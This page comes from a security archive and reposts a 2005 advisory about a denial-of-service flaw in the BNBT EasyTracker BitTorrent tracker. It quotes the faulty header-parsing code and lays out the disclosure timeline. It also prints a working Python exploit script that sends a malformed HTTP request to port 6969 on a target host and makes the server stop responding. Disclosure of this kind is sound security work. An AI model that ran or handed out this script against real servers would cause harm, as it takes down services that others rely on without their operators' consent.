首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BNBT EasyTracker DoS
来源:http://secway.org 作者:Sowhat 发布时间:2005-09-19  

BNBT EasyTracker DoS

Summary
"The Trinity Edition of BNBT (TrinEdit) a modified version of BNBT, whose C++ source can be compiled for any operating system; BNBT EasyTracker a Windows Installer for The Trinity Edition of BNBT, a C++ BitTorrent Tracker."

A Denial of Service vulnerability exists within BNBT which allows an attacker to cause the BNBT to stop responding.

Credit:
The information has been provided by Sowhat.
The original article can be found at: http://secway.org/advisory/AD20050830.txt

Details
Vulnerable Systems:
* BNBT version 7.7r3.2004.10.27 and prior

A specifically crafted HTTP request will cause the BNBT Server stop responding.

By Sending a request such as "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" will cause the DoS. It seems that the bug is located in client.cpp, "//grab headers" section.

Code snips:
client.cpp:
// grab headers

string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );

strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),
iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

while( 1 )
{
string :: size_type iSplit = strTemp.find( ":" );
string :: size_type iEnd = strTemp.find( "\r\n" );

if( iSplit == string :: npos )
{
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );

break;
}

string strKey = strTemp.substr( 0, iSplit );
string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit -
strlen( "\r\n" ) );//Bug here ??

rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );

if( iEnd == string :: npos )
break;
}

Disclosure Timeline:
2005.08.22 Vendor notified via Webform,no email found
2005.08.30 Vendor no response. Advisory Released

Exploit:
//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org

# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/

import sys
import string
import socket

if (len(sys.argv) != 2):
print "\nUsage: " + sys.argv[0] + " TargetIP\n"
print "#################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "#################################"
sys.exit(0)

host = sys.argv[1]
port = 6969

payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)

#EoF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VisualBoy Advanced Local Buffe
·CuteNews Code Execution
·Counter Strike 2D DoS
·Mozilla Suite - Firefox - Nets
·Zebedee DoS
·GNU Mailutils imap4d search Co
·Mercury Mail Multiple Buffer O
·Realplayer and Helix Player RP
·Windows XP Firewall Bypassing
·MultiTheftAuto Privileges Esca
·COOL! Remote Control DoS
·My Little Forum SQL Injection
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved